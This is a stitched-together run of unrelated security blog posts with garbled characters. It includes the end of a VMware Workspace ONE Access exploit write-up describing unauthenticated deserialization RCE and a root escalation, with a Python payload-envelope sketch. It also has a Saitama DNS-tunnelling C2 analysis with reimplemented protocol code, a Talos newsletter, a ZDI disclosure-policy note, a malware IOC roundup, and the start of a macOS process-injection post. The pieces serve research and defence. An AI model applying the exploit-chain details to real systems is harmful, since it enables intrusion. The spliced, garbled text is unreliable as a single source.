                log.debug(new Object[]{"restored " + this._htEvalStart.size() + " entries from state info"});
                return true;
            }
        } catch (Exception var6) {
            log.warn(new Object[]{var6.getMessage()});
            return false;
        }
    }
}
At [6] the code calls decrypt, decrypting the data with a hardcoded key. Then, at [7], the code calls readObject on the attacker-supplied bytes. At this point we can supply our deserialization gadget right inside the JDBC URI string, removing any outbound connection requirement! Here is a proof of concept to execute the command touch /tmp/pwn:
I have included the licensecheck-1.1.5.jar library in the exploit directory so that the exploit can be re-built and replicated. It should be noted that the first connection to a PostgreSQL database doesnβt need to be established for the attack to succeed so an invalid host/port is perfectly fine. Details about this attack and others similar to it can be found in the excellent blog post by Xu Yuanzhen.
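To make the payload layout concrete, the outer envelope that setState() and deserialize() expect can be sketched as below. This is only a sketch, not the original proof of concept: the magic value and big-endian int layout are read from the decompiled code above, the length-prefixed ciphertext format assumed for Encrypt.readByteArray is an assumption, and the encrypted gadget payload itself is omitted.

```python
import base64
import struct

MAGIC = -889267490  # version-2 magic checked in deserialize()

def build_envelope(ciphertext: bytes) -> str:
    # deserialize() reads a big-endian int and compares it to the magic;
    # deserialize_v2() then reads the ciphertext via Encrypt.readByteArray,
    # assumed here to be a length-prefixed byte array.
    blob = struct.pack(">i", MAGIC) + struct.pack(">i", len(ciphertext)) + ciphertext
    return base64.b64encode(blob).decode()

env = build_envelope(b"\x00" * 16)  # placeholder ciphertext
decoded = base64.b64decode(env)
magic = struct.unpack(">i", decoded[:4])[0]
print(magic)  # -889267490
```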
The final point I will make about this is that the LicenseChecker class could have also been used to exploit CVE-2021-21985 since the licensecheck-1.1.5.jar library was loaded into the target vCenter process coupled with publicly available gadget chains.
publishCaCert and gatherConfig Privilege Escalation
This exploit was straightforward and involved overwriting the permissions of the certproxyService.sh script so that it could be modified by the horizon user.
Proof of Concept
I built three exploits called Hekate (thatβs pronounced as heh-ka-teh). The first exploit leverages the MySQL JDBC driver and the second exploit leverages the PostgreSQL JDBC driver. Both exploits target the server and client sides, requiring an outbound connection to the attacker.
The third exploit leverages the PostgreSQL JDBC driver again, this time re-using the com.vmware.licensecheck.* classes and avoids any outbound network connections to the attacker. This is the exploit that was demonstrated at Black Hat USA 2022.
All the vulnerabilities used in Hekate also impacted the cloud version of the VMWare Workspace ONE Access in its default configuration.
Exposure
Using a quick favicon hash search, Shodan reveals that roughly 700 active hosts were vulnerable at the time of discovery. Although the exposure is limited, the impacted systems are highly critical. An attacker can gain access to third-party systems, grant assertions and breach the perimeter of an enterprise network, none of which is possible with a run-of-the-mill exposed IoT device.
Conclusion
The limitation of CVE-2020-4006 was that it required authentication and targeted port 8443. In comparison, this attack chain targets port 443, which is far more likely to be exposed externally. Additionally, no authentication is required while still achieving root access, resulting in the complete compromise of the affected appliance. Finally, it can be exploited in a variety of ways, client-side or server-side, without requiring a deserialization gadget.
A malware sample dubbed "Saitama" was recently uncovered by security firm Malwarebytes in a weaponized document, possibly targeted at the Jordanian government. The Saitama implant uses DNS as its sole Command and Control channel and utilizes long sleep times and (sub)domain randomization to evade detection. As no server-side implementation was available for this implant, our detection engineers had very little to go on to verify whether their detection would trigger on such a communication channel. This blog documents the development of a Saitama server-side implementation, as well as several approaches taken by Fox-IT / NCC Group's Research and Intelligence Fusion Team (RIFT) to detect DNS-tunnelling implants such as Saitama. The developed implementation as well as recordings of the implant are shared on the Fox-IT GitHub.
Introduction
For its Managed Detection and Response (MDR) offering, Fox-IT is continuously building and testing detection coverage for the latest threats. Such detection efforts vary across all tactics, techniques, and procedures (TTPβs) of adversaries, an important one being Command and Control (C2). Detection of Command and Control involves catching attackers based on the communication between the implants on victim machines and the adversary infrastructure.Β Β
In May 2022, security firm Malwarebytes published a two-part blog about a malware sample that utilizes DNS as its sole channel for C2 communication. This sample, dubbed "Saitama", sets up a C2 channel that tries to stay stealthy using randomization and long sleep times. These features make the traffic difficult to detect, even though the implant does not use DNS-over-HTTPS (DoH) to encrypt its DNS queries.
Although DNS tunnelling remains a relatively rare technique for C2 communication, it should not be ignored completely. While focusing on Indicators of Compromise (IOCβs) can be useful for retroactive hunting, robust detection in real-time is preferable. To assess and tune existing coverage, a more detailed understanding of the inner workings of the implant is required. This blog will use the Saitama implant to illustrate how malicious DNS tunnels can be set-up in a variety of ways, and how this variety affects the detection engineering process. Β
To assist defensive researchers, this blogpost comes with the publication of a server-side implementation of Saitama on the Fox-IT GitHub. This can be used to control the implant in a lab environment. Moreover, βon the wireβ recordings of the implant that were generated using said implementation are also shared as PCAP and Zeek logs. This blog also details multiple approaches towards detecting the implantβs traffic, using a Suricata signature and behavioural detection.Β
Reconstructing the Saitama trafficΒ
The behaviour of the Saitama implant from the perspective of the victim machine has already been documented elsewhere. However, to generate a full recording of the implant's behaviour, a C2 server is needed that properly controls and instructs the implant. Of course, the source code of the C2 server used by the actual developer of the implant is not available.
If you aim to detect the malware in real-time, detection efforts should focus on the way traffic is generated by the implant, rather than the specific domains that the traffic is sent to. We strongly believe in the βPCAP or it didnβt happenβ philosophy. Thus, instead of relying on assumptions while building detection, we built the server-side component of Saitama to be able to generate a PCAP.Β
The server-side implementation of Saitama can be found on the Fox-IT GitHub page. Be aware that this implementation is a Proof-of-Concept. We do not intend on fully weaponizing the implant βfor the greater goodβ, and have thus provided resources to the point where we believe detection engineers and blue teamers have everything they need to assess their defences against the techniques used by Saitama.
Letβs do the twist
The usage of DNS as the channel for C2 communication has a few upsides and quite some major downsides from an attackerβs perspective. While it is true that in many environments DNS is relatively unrestricted, the protocol itself is not designed to transfer large volumes of data. Moreover, the caching of DNS queries forces the implant to make sure that every DNS query sent is unique, to guarantee the DNS query reaches the C2 server.Β Β
For this, the Saitama implant relies on continuously shuffling the character set used to construct DNS queries. While this shuffle makes it near-impossible for two consecutive DNS queries to be the same, it does require the server and client to be perfectly in sync for them to both shuffle their character sets in the same way.Β Β
On startup, the Saitama implant generates a random number between 0 and 46655 and assigns this to a counter variable. Using a shared secret key (βharutoβ for the variant discussed here) and a shared initial character set (βrazupgnv2w01eos4t38h7yqidxmkljc6b9f5β), the client encodes this counter and sends it over DNS to the C2 server. This counter is then used as the seed for a Pseudo-Random Number Generator (PRNG). Saitama uses the Mersenne Twister to generate a pseudo-random number upon every βtwistβ.Β
To encode this counter, the implant relies on a function named β_IntToStringβ. This function receives an integer and a βbase stringβ, which for the first DNS query is the same initial, shared character set as identified in the previous paragraph. Until the input number is equal or lower than zero, the function uses the input number to choose a character from the base string and prepends that to the variable βstrβ which will be returned as the function output. At the end of each loop iteration, the input number is divided by the length of the baseString parameter, thus bringing the value down.Β
Function used by Saitama client to convert an integer into an encoded string.Β
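Based on the description above, the conversion amounts to base-36 encoding over the shared alphabet. The sketch below re-implements it in Python; the modulo-based character choice is an assumption consistent with the divide-by-length loop, and the exact inverse follows directly:

```python
CHARSET = "razupgnv2w01eos4t38h7yqidxmkljc6b9f5"  # shared initial character set

def int_to_string(num: int, base: str = CHARSET) -> str:
    # Prepend one character per iteration, then shrink num by the base
    # length, mirroring the client-side _IntToString loop described above.
    s = ""
    while num > 0:
        s = base[num % len(base)] + s
        num //= len(base)
    return s or base[0]

def string_to_int(s: str, base: str = CHARSET) -> int:
    # Exact inversion by positional weights.
    n = 0
    for ch in s:
        n = n * len(base) + base.index(ch)
    return n

print(string_to_int(int_to_string(31337)))  # 31337
```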
To determine the initial seed, the server has to "invert" this function to convert the encoded string back into its original number. However, information gets lost during the client-side conversion because it rounds down without any decimals. The server tries to invert the conversion using simple multiplication, so it may calculate a number that does not equal the seed sent by the client, and it must therefore verify whether the inversion produced the correct seed. If not, the server simply tries successively higher numbers until the correct seed is found.
Once this hurdle is taken, the rest of the server-side implementation is trivial. The client appends its current counter value to every DNS query sent to the server. This counter is used as the seed for the PRNG. This PRNG is used to shuffle the initial character set into a new one, which is then used to encode the data that the client sends to the server. Thus, when both server and client use the same seed (the counter variable) to generate random numbers for the shuffling of the character set, they both arrive at the exact same character set. This allows the server and implant to communicate in the same βlanguageβ. The server then simply substitutes the characters from the shuffled alphabet back into the βbaseβ alphabet to derive what data was sent by the client.Β Β
Server-side implementation to arrive at the same shuffled alphabet as the client.Β
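This synchronization can be illustrated with a short sketch. Note that it is illustrative only: Python's random module also uses the Mersenne Twister, but its shuffle routine is not guaranteed to match the implant's byte-for-byte.

```python
import random

INITIAL = "razupgnv2w01eos4t38h7yqidxmkljc6b9f5"  # shared initial character set

def shuffled_alphabet(counter: int) -> str:
    # Both sides seed a Mersenne Twister PRNG with the shared counter and
    # shuffle the same initial alphabet, arriving at the same "language".
    chars = list(INITIAL)
    random.Random(counter).shuffle(chars)
    return "".join(chars)

client = shuffled_alphabet(1234)
server = shuffled_alphabet(1234)
assert client == server  # in sync: identical shuffled alphabets

# The server decodes by substituting shuffled characters back into the
# base alphabet.
encoded = client[INITIAL.index("h")]
decoded = INITIAL[server.index(encoded)]
print(decoded)  # h
```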
Twist, Sleep, Send, Repeat
Many C2 frameworks allow attackers to manually set the minimum and maximum sleep times for their implants. While low sleep times allow attackers to more quickly execute commands and receive outputs, higher sleep times generate less noise in the victim network. Detection often relies on thresholds, where suspicious behaviour will only trigger an alert when it happens multiple times in a certain period.Β Β
The Saitama implant uses hardcoded sleep values. During active communication (such as when it returns command output back to the server), the minimum sleep time is 40 seconds while the maximum sleep time is 80 seconds. On every DNS query sent, the client will pick a random value between 40 and 80 seconds. Moreover, the DNS query is not sent to the same domain every time but is distributed across three domains. On every request, one of these domains is randomly chosen. The implant has no functionality to alter these sleep times at runtime, nor does it possess an option to βskipβ the sleeping step altogether.Β Β
Sleep configuration of the implant. The integers represent sleep times in milliseconds.
These sleep times and distribution of communication hinder detection efforts, as they allow the implant to further βblend inβ with legitimate network traffic. While the traffic itself appears anything but benign to the trained eye, the sleep times and distribution bury the βneedleβ that is this implantβs traffic very deep in the haystack of the overall network traffic.Β Β
For attackers, choosing values for the sleep time is a balancing act between keeping the implant stealthy while keeping it usable. Considering Saitamaβs sleep times and keeping in mind that every individual DNS query only transmits 15 bytes of output data, the usability of the implant is quite low. Although the implant can compress its output using zlib deflation, communication between server and client still takes a lot of time. For example, the standard output of the βwhoami /privβ command, which once zlib deflated is 663 bytes, takes more than an hour to transmit from victim machine to a C2 server.Β Β
Transmission between server implementation and the implant
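A back-of-the-envelope estimate of the sleep time alone illustrates this. The figures below ignore acknowledgement queries and per-query protocol overhead, which push the real transfer time past the hour observed above.

```python
import math

OUTPUT_BYTES = 663      # zlib-deflated output of "whoami /priv"
BYTES_PER_QUERY = 15    # output data carried per DNS query
MEAN_SLEEP_S = (40 + 80) / 2

queries = math.ceil(OUTPUT_BYTES / BYTES_PER_QUERY)
minutes = queries * MEAN_SLEEP_S / 60
print(queries, minutes)  # 45 queries, 45.0 minutes of sleeping alone
```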
The implant does contain a set of hardcoded commands that can be triggered using only one command code, rather than sending the command in its entirety from the server to the client. However, there is no way of knowing whether these hardcoded commands are even used by attackers or are left in the implant as a means of misdirection to hinder attribution. Moreover, the output from these hardcoded commands still has to be sent back to the C2 server, with the same delays as any other sent command.Β
Detection
Detecting DNS tunnelling has long been a subject of research, as the technique can be implemented in a multitude of ways. In addition, the complications of the communication channel force attackers to make more noise, as they must send a lot of data over a channel that was not designed for that purpose. While "idle" implants can be hard to detect due to the little communication occurring over the wire, any DNS implant has to make more noise once it starts receiving commands and sending command output. These communication "bursts" are where DNS tunnelling can most reliably be detected. In this section we give examples of how to detect Saitama and a few well-known tools used by actual adversaries.
Signature-basedΒ
Where possible we aim to write signature-based detection, as this provides a solid base and quick tool attribution. The randomization used by the Saitama implant as outlined previously makes signature-based detection challenging in this case, but not impossible. When actively communicating command output, the Saitama implant generates a high number of randomized DNS queries. This randomization does follow a specific pattern that we believe can be generalized in the following Suricata rule:Β
Only trigger if there are more than 50 queries in the last 3600 seconds. And only trigger once per 3600 seconds.Β
Table one: Content matches for Suricata IDS rule
The choice for 28-31 characters is based on the structure of DNS queries containing output. First, one byte is dedicated to the "send and receive" command code. Then follows the encoded ID of the implant, which can take between 1 and 3 bytes. Next, 2 bytes are dedicated to the byte index of the output data, followed by 20 bytes of base32-encoded output. Lastly, the current value of the "counter" variable is sent; as this number can range between 0 and 46655, it takes between 1 and 5 bytes.
Behaviour-basedΒ
The randomization that makes it difficult to write signatures also works to the defender's advantage: most benign DNS queries are far from random. As seen in the table below, each hack tool outlined has at least one subdomain with an encrypted or encoded part. While one might initially opt for measuring entropy to approximate randomness, that technique is less reliable when the input string is short. The usage of N-grams, an approach we have previously written about, is better suited.
Table two: Example DNS queries for various toolings that support DNS tunnelling
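A quick illustration of why plain entropy struggles on short strings: a benign label and a random-looking label of the same length can have identical character-level Shannon entropy, so neither stands out.

```python
import math
from collections import Counter

def shannon_entropy(s: str) -> float:
    # Character-level Shannon entropy in bits.
    counts = Counter(s)
    return -sum((c / len(s)) * math.log2(c / len(s)) for c in counts.values())

# Four distinct characters each: entropy cannot tell these labels apart.
print(shannon_entropy("mail"), shannon_entropy("x9qz"))  # 2.0 2.0
```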
Unfortunately, the detection of randomness in DNS queries is by itself not a solid enough indicator to detect DNS tunnels without yielding large numbers of false positives. However, a second limitation of DNS tunnelling is that a DNS query can only carry a limited number of bytes. To be an effective C2 channel an attacker needs to be able to send multiple commands and receive corresponding output, resulting in (slow) bursts of multiple queries.Β Β
This is where the second step for behaviour-based detection comes in: plainly counting the number of unique queries that have been classified as "randomized". The specifics of these bursts differ slightly between tools, but in general there is little or no idle time between two queries. Saitama is an exception here: it sleeps for a uniformly distributed 40 to 80 seconds between two queries, meaning an average one-minute delay. This expected sleep of 60 seconds is an intuitive starting point for determining the threshold. If we aggregate over an hour, we expect 60 queries distributed over 3 domains. However, this is the mean value, and in 50% of cases there are fewer than 60 queries in an hour.
To detect this reliably regardless of the random sleeps, we can use the fact that the sum of uniform random observations approximates a normal distribution. With this distribution we can calculate the number of queries that corresponds to an acceptable probability; looking at the distribution, that would be 53. We use 50 in our signature and other rules to account for possible packet loss and other unexpected factors. Note that this number varies between tools and is therefore not a set-in-stone threshold; different thresholds for different tools may be used to balance false positives and false negatives.
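The reasoning above can be sanity-checked with a small simulation (a sketch, not the exact derivation used for the rule): with uniform 40-80 second sleeps, the number of queries per hour concentrates tightly around 60, so an actively communicating implant crosses a 50-queries-per-hour threshold in virtually every hour.

```python
import random

def queries_in_hour(rng: random.Random) -> int:
    # Count DNS queries sent within one hour, sleeping a uniform 40-80 s
    # before each query, as the implant does.
    t, n = 0.0, 0
    while True:
        t += rng.uniform(40, 80)
        if t > 3600:
            return n
        n += 1

rng = random.Random(0)  # fixed seed for reproducibility
trials = [queries_in_hour(rng) for _ in range(10_000)]
hit_rate = sum(c >= 50 for c in trials) / len(trials)
print(round(hit_rate, 3))  # ~1.0: the 50-query threshold is nearly always crossed
```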
In summary, combining detection of random-appearing DNS queries with a minimum threshold of such queries per hour can be a useful approach for detecting DNS tunnelling. In our testing we found that some false positives remain, for example caused by antivirus solutions. Therefore, a last step is creating a small allow list of domains that have been verified to be benign.
While more sophisticated detection methods may be available, we believe this method is still powerful (at least powerful enough to catch this malware) and more importantly, easy to use on different platforms such as Network Sensors or SIEMs and on diverse types of logs.Β
Conclusion
When new malware arises, it is paramount to verify existing detection efforts to ensure they properly trigger on the newly encountered threat. While Indicators of Compromise can be used to retroactively hunt for possible infections, we prefer the detection of threats in (near-)real-time. This blog has outlined how we developed a server-side implementation of the implant to create a proper recording of the implantβs behaviour. This can subsequently be used for detection engineering purposes.Β
Strong randomization, such as observed in the Saitama implant, significantly hinders signature-based detection. We detect the threat by detecting its evasive method, in this case randomization. Legitimate DNS traffic rarely consists of random-appearing subdomains, and to see this occurring in large bursts to previously unseen domains is even more unlikely to be benign.Β Β
Resources
With the sharing of the server-side implementation and recordings of Saitama traffic, we hope that others can test their defensive solutions.Β Β
The server-side implementation of Saitama can be found on the Fox-IT GitHub.Β Β
This repository also contains an example PCAP & Zeek logs of traffic generated by the Saitama implant. The repository also features a replay script that can be used to parse executed commands & command output out of a PCAP.Β
Welcome to this weekβs edition of the Threat Source newsletter.Β
Everyone seems to want to create the next βNetflixβ of something. Xboxβs Game Pass is the βNetflix of video games.β Rent the Runway is a βNetflix of fashionβ where customers subscribe to a rotation of fancy clothes.Β
And now threat actors are looking to be the βNetflix of malware.β All categories of malware have some sort of "as-a-service"Β twist now. Some of the largest ransomware groups in the world operate βas a service,β allowing smaller groups to pay a fee in exchange for using the larger groupβs tools.Β Β
Our latest report on information-stealers points out that "infostealers as-a-service" are growing in popularity, and our researchers also discovered a new "C2 as-a-service" platform where attackers can pay to have this third-party site act as their command and control. And like Netflix, this Dark Utilities site offers several other layers of tools and malware to choose from. This is a particularly scary trend to me because of how easy (relatively speaking) this makes things for anyone with a basic knowledge of computers to carry out a cyber attack. Netflix made it easy for people like my Grandma to find everything she needs in one place to watch anything from throwback shows like "Knight Rider" to the live action of "Shrek: The Musical" and everything in between.
How much longer before anyone with access to the internet can log into a singular dark web site and surf for whatever theyβre in the mood for that day? As someone who has spent zero time on the actual dark web, this may already exist and I donβt even know about it, but maybe a threat actor will one day be smart enough to make a website that looks as sleek as Netflix so you can scroll through suggestions and hand-pick the Redline information-stealer followed up by a relaxing evening of ransomware from Conti.Β Β
With everything going βas a serviceβ it means I donβt necessarily have to have the coding skills to create my own bespoke malware. So long as I have the cash, I could conceivably buy an out-of-the-box tool online and deploy it against whoever I want.Β Β
This is not necessarily as easy as picking a show on Netflix. But itβs not a huge leap to look at the skills gap Netflix closes by allowing my Grandma to surf for any show she wants without having to scroll through cable channels or drive to the library to check out a DVD, and someone who knows how to use PowerShell being able to launch an βas-a-service" ransomware attack.Β Β
I have no idea what the easy solution is here aside from all the traditional forms of detection and prevention we preach. Outside of direct law enforcement intervention, there are few ways to take these βas a serviceβ platforms offline. Maybe that just means we need to start working on the βNetflix of cybersecurity tools.βΒ
The one big thing
Historically, cybercrime was considered white-collar criminal behavior perpetrated by those who were knowledgeable and turned bad. Now, technology has become such an integral part of our lives that anyone with a smartphone and the desire can get started in cybercrime. The growth of cryptocurrencies and their associated anonymity, whether legitimate or not, has garnered the attention of criminals who formerly operated in traditional criminal enterprises and have now shifted to cybercrime and identity theft. New research from Talos indicates that small-time criminals are increasingly taking part in online crime like phishing and credit card scams instead of traditional "hands-on" crime.
Why do I care?
Everyone panics when the local news shows a graph with "violent crime" increasing in our respective areas. We should be just as worried about the increase in cybercrime over the past few years, and its potential to keep growing. As mentioned above, "as a service" malware offerings have made it easier for anyone with internet access to carry out a cyber attack and deploy ransomware, or just try to scam someone out of a few thousand dollars.
So now what?
Law enforcement, especially at the local level, is going to need to evolve along with the criminals it is tasked with protecting the general public from. The future criminal is going to be aware of operational security and of technologies like Tor that make arrests increasingly difficult. This is as good a time as any to talk to your family about cybersecurity and internet safety. Remind family members about common types of scams, like the classic "I'm in the hospital and need money."
Other news of note
Microsoft Patch Tuesday was headlined by another zero-day vulnerability in the Microsoft Support Diagnostics Tool (MSDT). CVE-2022-35743 and CVE-2022-34713 are remote code execution vulnerabilities in MSDT. However, only CVE-2022-34713 has been exploited in the wild, and Microsoft considers it "more likely" to be exploited. MSDT was already the target of the so-called "Follina" zero-day vulnerability in June. In all, Microsoft patched more than 120 vulnerabilities across all its products. Adobe also released updates on Tuesday to fix 25 vulnerabilities, mainly in Adobe Acrobat Reader. One critical vulnerability could lead to arbitrary code execution and a memory leak. (Talos blog, Krebs on Security, SecurityWeek)
Some of the U.K.'s 111 services were disrupted earlier this week after a suspected cyber attack against a managed service provider. The country's National Health Service warned residents that some emergency calls could be delayed and that others could not schedule health appointments. Advanced, the target of the attack, said it was investigating the potential theft of patient data. As of Thursday morning, at least nine NHS mental health trusts could face up to three weeks without access to vulnerable patients' records, though the incident has been "contained." (SC Magazine, Bloomberg, The Guardian)
An 18-year-old and her mother are facing charges in Nebraska over an alleged medicated abortion, based on information obtained from Facebook messages. Court records indicate state law enforcement submitted a search warrant to Meta, the parent company of Facebook, demanding all private data, including messages, that the company had for the two people charged. The contents of those messages were then used as the basis of a second search warrant, under which additional computers and devices were confiscated. Although the investigation began before the U.S. Supreme Court's reversal of Roe v. Wade, the case highlights a renewed focus on digital privacy and data storage. (Vice, CNN)
Today at the Black Hat USA conference, we announced some new disclosure timelines. Our standard 120-day disclosure timeline for most vulnerabilities remains, but for bug reports that result from faulty or incomplete patches, we will use a shorter timeline. Moving forward, the ZDI will adopt a tiered approach based on the severity of the bug and the efficacy of the original fix. The first tier will be a 30-day timeframe for most Critical-rated cases where exploitation is detected or expected. The second level will be a 60-day interval for Critical- and High-severity bugs where the patch offers some protections. Finally, there will be a 90-day period for other severities where no imminent exploitation is expected. As with our normal timelines, extensions will be limited and granted on a case-by-case basis.
Since 2005, the ZDI has disclosed more than 10,000 vulnerabilities to countless vendors. These bug reports and subsequent patches allow us to speak from vast experience when it comes to the topic of bug disclosure. Over the last few years, we've noticed a disturbing trend: a decrease in patch quality and a reduction in communications surrounding the patch. This has resulted in enterprises losing their ability to accurately estimate the risk to their systems. It's also costing them money and resources as bad patches get re-released and thus re-applied.
Adjusting our disclosure timelines is one of the few areas that we as a disclosure wholesaler can control, and it's something we have used in the past with positive results. For example, our disclosure timeline used to be 180 days. However, based on data we tracked through vulnerability disclosure and patch release, we were able to lower that to 120 days, which helped reduce vendors' overall time-to-fix. Moving forward, we will be tracking failed patches more closely and will make future policy adjustments based on the data we collect.
Another thing we announced today is the creation of a new Twitter handle: @thezdibugs. This feed will only tweet out published advisories that either carry a high CVSS score, are 0-days, or result from Pwn2Own. If you're interested in those types of bug reports, we ask that you give it a follow. We're also now on Instagram, and you can follow us there if you prefer that platform over Twitter.
Looking at our published and upcoming bug reports, we are on track for our busiest year ever, for the third year in a row. That also means we'll have plenty of data to look at as we track incomplete or otherwise faulty patches, and we'll use this data to adjust these timelines as needed based on what we are seeing across the industry. Other groups may have different timelines, but this is our starting point. With an estimated 1,700 disclosures this year alone, we should be able to gather plenty of metrics. Hopefully, we will see improvements as time goes on.
Until then, stay tuned to this blog for updates, subscribe to our YouTube channel, and follow us on Twitter for the latest news and research from the ZDI.
New Disclosure Timelines for Bugs Resulting from Incomplete Patches
Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Aug. 5 and Aug. 12. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.
As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats are subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.
For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of a technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. There are five distinct shades, with the darkest indicating that no files exhibited the technique's behavior and the brightest indicating that the behavior was observed in 75 percent or more of the files.
The most prevalent threats highlighted in this roundup are:
Threat Name
Type
Description
Win.Dropper.Tofsee-9960568-0
Dropper
Tofsee is multi-purpose malware that features a number of modules used to carry out various activities such as sending spam messages, conducting click fraud, mining cryptocurrency and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages to infect additional systems and increase the size of the botnet under the operator's control.
Win.Dropper.TrickBot-9960840-0
Dropper
Trickbot is a banking trojan targeting sensitive information for certain financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB scripts.
Win.Trojan.Zusy-9960880-0
Trojan
Zusy, also known as TinyBanker or Tinba, is a trojan that uses man-in-the-middle attacks to steal banking information. When executed, it injects itself into legitimate Windows processes such as "explorer.exe" and "winver.exe." When the user accesses a banking website, it displays a form to trick the user into submitting personal information.
Win.Dropper.DarkComet-9961766-1
Dropper
DarkComet and related variants are a family of remote access trojans designed to provide an attacker with control over an infected system. This malware can download files from a victim's machine and includes mechanisms for persistence and hiding. It also has the ability to send usernames and passwords back from the infected system.
Win.Ransomware.TeslaCrypt-9960924-0
Ransomware
TeslaCrypt is a well-known ransomware family that encrypts a user's files with strong encryption and demands Bitcoin in exchange for a file decryption service. A flaw in the encryption algorithm was discovered that allowed files to be decrypted without paying the ransom, and eventually the malware developers released the master key, allowing all encrypted files to be recovered easily.
Win.Virus.Xpiro-9960895-1
Virus
Expiro is a known file infector and information-stealer that hinders analysis with anti-debugging and anti-analysis tricks.
Win.Dropper.Emotet-9961142-0
Dropper
Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a wide variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Dropper.Remcos-9961392-0
Dropper
Remcos is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, and capture screenshots. This malware is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Dropper.Ramnit-9961396-0
Dropper
Ramnit is a banking trojan that monitors web browser activity on an infected machine and collects login information from financial websites. It also has the ability to steal browser cookies and attempts to hide from popular antivirus software.
Threat Breakdown
Win.Dropper.Tofsee-9960568-0
Indicators of Compromise
IOCs collected from dynamic analysis of 10 samples
Registry Keys
Occurrences
<HKU>\.DEFAULT\CONTROL PANEL\BUSES Value Name: Config4
3
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: LanguageList
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\system32\dhcpqec.dll,-100
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\system32\dhcpqec.dll,-101
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\system32\dhcpqec.dll,-103
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\system32\dhcpqec.dll,-102
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\system32\napipsec.dll,-1
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\system32\napipsec.dll,-2
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\system32\napipsec.dll,-4
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\system32\napipsec.dll,-3
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\system32\tsgqec.dll,-100
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\system32\tsgqec.dll,-101
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\system32\tsgqec.dll,-102
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\system32\tsgqec.dll,-103
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\system32\eapqec.dll,-100
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\system32\eapqec.dll,-101
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\system32\eapqec.dll,-102
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\system32\eapqec.dll,-103
3
<HKU>\.DEFAULT\CONTROL PANEL\BUSES Value Name: Config0
3
<HKU>\.DEFAULT\CONTROL PANEL\BUSES Value Name: Config1
3
<HKU>\.DEFAULT\CONTROL PANEL\BUSES Value Name: Config2
3
<HKU>\.DEFAULT\CONTROL PANEL\BUSES Value Name: Config3
3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FNWISXTV Value Name: ErrorControl
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FNWISXTV Value Name: DisplayName
1
Mutexes
Occurrences
Global\27a1e0c1-13fc-11ed-9660-001517101edf
1
Global\30977501-13fc-11ed-9660-001517215b93
1
IP Addresses contacted by malware. Does not indicate maliciousness
Occurrences
216[.]146[.]35[.]35
3
31[.]13[.]65[.]174
3
142[.]251[.]40[.]196
3
96[.]103[.]145[.]165
3
31[.]41[.]244[.]82
3
31[.]41[.]244[.]85
3
80[.]66[.]75[.]254
3
80[.]66[.]75[.]4
3
31[.]41[.]244[.]128
3
31[.]41[.]244[.]126/31
3
208[.]76[.]51[.]51
2
74[.]208[.]5[.]20
2
208[.]76[.]50[.]50
2
202[.]137[.]234[.]30
2
212[.]77[.]101[.]4
2
193[.]222[.]135[.]150
2
203[.]205[.]219[.]57
2
47[.]43[.]18[.]9
2
67[.]231[.]144[.]94
2
188[.]125[.]72[.]74
2
40[.]93[.]207[.]0/31
2
205[.]220[.]176[.]72
2
135[.]148[.]130[.]75
2
121[.]53[.]85[.]11
2
67[.]195[.]204[.]72/30
1
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousness
[Image caption: This was added to the Xcode template to address a process injection vulnerability we reported.]
In macOS 12.0.1 Monterey, Apple fixed CVE-2021-30873. This was a process injection vulnerability affecting (essentially) all macOS AppKit-based applications. We reported this vulnerability to Apple, along with methods to use this vulnerability to escape the sandbox, elevate privileges to root and bypass the filesystem restrictions of SIP. In this post, we will first describe what process injection is, then the details of this vulnerability and finally how we abused it.
Process injection
